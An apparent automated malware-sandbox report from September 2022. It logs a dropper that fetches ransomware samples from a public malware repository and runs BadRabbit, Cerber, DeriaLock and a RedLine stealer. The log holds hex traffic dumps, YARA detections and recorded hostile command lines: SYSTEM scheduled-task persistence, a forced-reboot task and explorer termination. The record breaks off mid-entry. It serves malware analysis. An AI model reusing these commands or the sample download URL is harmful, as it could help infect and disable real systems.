                                                                                                                                                2022-09-29 12:50:05 UTC13635INData Raw: 91 96 f5 66 d7 03 51 3b d5 d7 66 5d fe ff 8f 81 06 8a 8a 31 35 9c 46 53 71 a3 d1 11 e2 e5 13 98 96 c4 70 9d d3 95 18 0f 4c cc 52 dc 85 15 41 21 0c 00 05 9e ec e5 15 49 40 6a 11 bb 6f 48 31 b8 57 aa 34 a6 2c 32 e4 f4 f1 09 17 7e 03 43 bc 28 bf 5d 6d 7b 2e 1a ee 2e 82 c5 5c ab a2 9c d6 e8 3c 9a bb 8c a6 ae 73 69 ee 8e dd 35 47 06 9b c0 1a a3 8c 2b 73 65 ff 2a 04 f6 28 ac ef de 9b 06 d5 e2 83 c9 73 8d da 2e 54 55 ab 01 49 52 26 5b ec 23 76 ad b0 59 9c a5 cc 92 79 a6 d8 55 9f f4 86 d5 7f 53 80 e5 a8 2f bb a1 c1 9e c8 22 82 bc 19 e5 30 a5 76 47 a7 99 17 b0 0b 20 b3 cb c2 e1 95 34 56 75 78 37 54 6f 52 39 61 a0 18 60 04 c1 ab b0 e4 9d e7 c1 8c a0 c0 b1 78 d4 ed 6c bc 95 0a 09 69 76 03 f1 52 bd ef 32 03 8c 62 82 26 b5 19 d0 ab 15 14 88 df f6 46 0b 55 b9 95 42 cd
                                                                                                                                                Data Ascii: fQ;f]15FSqpLRA!I@joH1W4,2~C(]m{..\<si5G+se*(s.TUIR&[#vYyUS/"0vG 4Vux7ToR9a`xlivR2b&FUB
                                                                                                                                                2022-09-29 12:50:05 UTC13651INData Raw: 3f c5 23 19 26 4e 1a b6 df b3 e7 20 28 34 02 dc b3 2a 6d 32 d3 83 a6 a6 a6 c8 31 bf bc 14 04 e4 cc f2 ba 24 9c cd e1 d6 b8 72 0d 85 82 39 6c c6 d1 6d dd 87 8b f0 09 09 c3 1f c0 a6 08 28 c2 b3 d6 24 7e d8 20 c0 98 7d 67 4d 8d 49 01 60 0b 0a e9 54 e5 21 0c c4 04 3e b1 2d d1 bd 4b d0 c0 dd 75 91 83 f6 12 76 c8 d7 73 1a 3d cb a2 5b c6 0b f1 13 af 47 b7 fe c3 54 c8 9a ba e0 dc 13 7b e4 bb 40 84 51 aa 53 ce ec e5 6d 1f cf ab b4 74 cf ea c3 ed dc 89 5c 57 0b 92 75 90 2f 59 ba 2b aa cc f2 22 03 a3 8e 47 69 47 16 c4 96 f5 6b 80 6f f5 81 fe 00 4b e0 18 24 5f 4b 02 a8 94 c9 f4 27 fa 3a 33 73 6d 3f 66 46 3b bc cb db 06 9c 17 6c 6c e7 34 e6 9d 3f 43 1a 07 fe ff 5b 13 36 35 63 a1 d7 26 35 ee 3e 58 89 dc b5 c9 e3 8a fe e3 96 54 91 4c fb 5a d6 d1 53 20 de 38 16 42 aa 72
                                                                                                                                                Data Ascii: ?#&N (4*m21$r9lm($~ }gMI`T!>-Kuvs=[GT{@QSmt\Wu/Y+"GiGkoK$_K':3sm?fF;ll4?C[65c&5>XTLZS 8Br
                                                                                                                                                2022-09-29 12:50:05 UTC13667INData Raw: e3 da 36 b9 21 50 ff 88 d4 57 d3 21 97 8c 17 76 b3 57 e4 4b 7e 98 15 b5 e7 4f f0 80 aa 5b b3 35 78 5a 68 38 1c 85 66 ce f1 65 74 60 97 34 fb 59 f6 d5 b4 5a 28 1b 46 73 62 cc fb 51 5c 18 f3 66 c2 15 db 97 97 b3 a0 4c d8 be 17 a0 81 e8 59 75 b7 83 5a 49 1c 0d 36 01 76 cd f9 d2 25 56 6d 79 85 df e3 74 55 b0 84 af 08 ef 6c 40 ad de c6 3d fb bd 19 6a 03 5a 19 94 90 d5 dd 9f b5 dc f8 42 64 fb 24 4e a7 d7 00 72 58 69 a8 42 e9 ed 9e a9 2b 18 bb 56 c4 5c 36 2b 31 d2 9e 06 17 af 8f 22 49 02 2f 04 06 01 cc 22 f6 42 e9 ba ef 0b 19 ba 7c a0 fc 94 f7 b9 89 57 0d 67 27 a3 36 36 85 1f fa 85 96 ee 57 77 a3 36 9d 36 fa 41 59 0f 1a 78 a5 5f f1 31 bc 6e e8 2a 18 5b 28 94 38 f4 36 7d 02 e5 d7 9b 48 d8 de 91 24 3e 22 a5 5b 90 77 9d b0 b6 dc 18 e2 68 69 aa 42 f7 af 27 df 63 f0
                                                                                                                                                Data Ascii: 6!PW!vWK~O[5xZh8fet`4YZ(FsbQ\fLYuZI6v%VmytUl@=jZBd$NrXiB+V\6+1"I/"B|Wg'66Ww66AYx_1n*[(86}H$>"[whiB'c
                                                                                                                                                2022-09-29 12:50:05 UTC13683INData Raw: c4 5a 8d 69 34 a7 68 7b 75 2b c6 e3 f9 61 61 f0 27 b3 6e b0 aa c4 3b ea 53 7b 2c b1 4d 8d 56 dc 19 d1 65 b3 7c f0 da 7b 25 80 41 4f 50 99 85 cb 33 d7 c9 34 6a 37 d9 bd 18 96 c3 8d 1a 9a 9f 99 74 49 13 f7 14 4b cf 63 97 27 ac 26 c7 5b 88 5b 8b 4f b4 9f bb dd da 3f 7d b5 fe 02 50 79 21 ac 69 39 61 07 02 b5 a9 dd a1 e1 a3 36 ff 09 e9 b1 51 32 9c 3c bd 06 bb fd 9b 02 e1 58 95 47 6a 2b 6d 63 de a5 1f 1e 2c f5 4b 0b cd 29 26 1c 19 e8 a8 20 e9 a7 97 e8 27 9d c1 4c b9 56 52 66 b7 d4 ab 43 4d f6 8c 7d a5 c7 0c db 8a 15 fe 8c 19 f4 b9 8a 21 26 ab 29 af f5 a4 9c c4 ab 0c 5c ad 9b 97 65 ea 8c 4a a4 74 88 04 de c9 de f6 82 a2 89 74 77 d3 31 7d dd cc 69 6d a6 7c a5 a4 1a 39 be 7c 12 0c c9 0d 6a 11 a0 98 b9 0a ee 10 ba a4 dc 53 be 62 fc 15 88 dc 18 77 82 77 76 55 30 b2
                                                                                                                                                Data Ascii: Zi4h{u+aa'n;S{,MVe|{%AOP34j7tIKc'&[[O?}Py!i9a6Q2<XGj+mc,K)& 'LVRfCM}!&)\eJttw1}im|9|jSbwwvU0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                9140.82.121.4443192.168.2.349687C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:29 UTC577INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:47:28 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:48:29 UTC577INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Click to jump to process

                                                                                                                                                Click to jump to process

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Click to jump to process

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:14:48:10
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\Desktop\1jDe7zWnoe.exe"
                                                                                                                                                Imagebase:0x262e7ca0000
                                                                                                                                                File size:152064 bytes
                                                                                                                                                MD5 hash:3CE563E899291B59FA8C57C98CAD9B4E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Reputation:low

                                                                                                                                                Target ID:1
                                                                                                                                                Start time:14:48:20
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                Imagebase:0x7ff651c80000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:14:48:20
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                                Imagebase:0x7ff651c80000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:14:48:21
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                Imagebase:0x7ff651c80000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:14:48:22
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                Imagebase:0x7ff651c80000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:14:48:22
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                Imagebase:0x7ff651c80000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:14:48:23
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                Imagebase:0x7ff6d10e0000
                                                                                                                                                File size:163336 bytes
                                                                                                                                                MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:14:48:23
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                                                                                                Imagebase:0x7ff651c80000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:14:48:25
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                Imagebase:0x7ff651c80000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:14:48:29
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe"
                                                                                                                                                Imagebase:0xd0000
                                                                                                                                                File size:441899 bytes
                                                                                                                                                MD5 hash:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe, Author: Florian Roth
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 93%, ReversingLabs
                                                                                                                                                • Detection: 83%, Metadefender, Browse

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:14:48:29
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:14:48:29
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:119296 bytes
                                                                                                                                                MD5 hash:41789C704A0EECFDD0048B4B4193E752
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 86%, ReversingLabs
                                                                                                                                                • Detection: 78%, Metadefender, Browse

                                                                                                                                                Target ID:12
                                                                                                                                                Start time:14:48:29
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                                                                                                                                Imagebase:0xde0000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: 0000000C.00000003.314263722.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, Author: Christiaan Beek

                                                                                                                                                Target ID:13
                                                                                                                                                Start time:14:48:31
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:320760 bytes
                                                                                                                                                MD5 hash:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: cerber3, Description: Cerber3 , Source: 0000000D.00000000.307768688.0000000000448000.00000020.00000001.01000000.00000009.sdmp, Author: pekeinfo
                                                                                                                                                • Rule: Cerber, Description: Cerber Payload, Source: 0000000D.00000002.360524596.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                • Rule: Cerber, Description: Cerber Payload, Source: 0000000D.00000002.355663815.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                • Rule: cerber3, Description: Cerber3 , Source: 0000000D.00000000.308250321.0000000000448000.00000020.00000001.01000000.00000009.sdmp, Author: pekeinfo
                                                                                                                                                • Rule: cerber3, Description: Cerber3 , Source: 0000000D.00000000.306858920.0000000000448000.00000020.00000001.01000000.00000009.sdmp, Author: pekeinfo
                                                                                                                                                • Rule: Cerber, Description: Cerber Payload, Source: 0000000D.00000002.367850533.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                • Rule: cerber3, Description: Cerber3 , Source: 0000000D.00000000.305189776.0000000000448000.00000020.00000001.01000000.00000009.sdmp, Author: pekeinfo
                                                                                                                                                • Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe, Author: pekeinfo
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 91%, ReversingLabs
                                                                                                                                                • Detection: 76%, Metadefender, Browse

                                                                                                                                                Target ID:14
                                                                                                                                                Start time:14:48:31
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:taskkill /F /IM explorer.exe
                                                                                                                                                Imagebase:0x840000
                                                                                                                                                File size:74752 bytes
                                                                                                                                                MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:15
                                                                                                                                                Start time:14:48:31
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:16
                                                                                                                                                Start time:14:48:31
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c schtasks /Delete /F /TN rhaegal
                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:17
                                                                                                                                                Start time:14:48:32
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:18
                                                                                                                                                Start time:14:48:32
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:schtasks /Delete /F /TN rhaegal
                                                                                                                                                Imagebase:0xf0000
                                                                                                                                                File size:185856 bytes
                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:19
                                                                                                                                                Start time:14:48:33
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe"
                                                                                                                                                Imagebase:0x310000
                                                                                                                                                File size:495616 bytes
                                                                                                                                                MD5 hash:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: 00000013.00000000.310989196.0000000000356000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe, Author: Joe Security
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                • Detection: 69%, Metadefender, Browse

                                                                                                                                                Target ID:20
                                                                                                                                                Start time:14:48:34
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2112656973 && exit"
                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:21
                                                                                                                                                Start time:14:48:34
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:267776 bytes
                                                                                                                                                MD5 hash:7D80230DF68CCBA871815D68F016C282
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe, Author: ditekSHen
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 88%, ReversingLabs
                                                                                                                                                • Detection: 66%, Metadefender, Browse

                                                                                                                                                Target ID:22
                                                                                                                                                Start time:14:48:35
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                                                                                                Imagebase:0x10f0000
                                                                                                                                                File size:82944 bytes
                                                                                                                                                MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:23
                                                                                                                                                Start time:14:48:35
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:24
                                                                                                                                                Start time:14:48:35
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:25
                                                                                                                                                Start time:14:48:36
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2112656973 && exit"
                                                                                                                                                Imagebase:0xf0000
                                                                                                                                                File size:185856 bytes
                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:26
                                                                                                                                                Start time:14:48:36
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:06:00
                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:27
                                                                                                                                                Start time:14:48:36
                                                                                                                                                Start date:29/09/2022
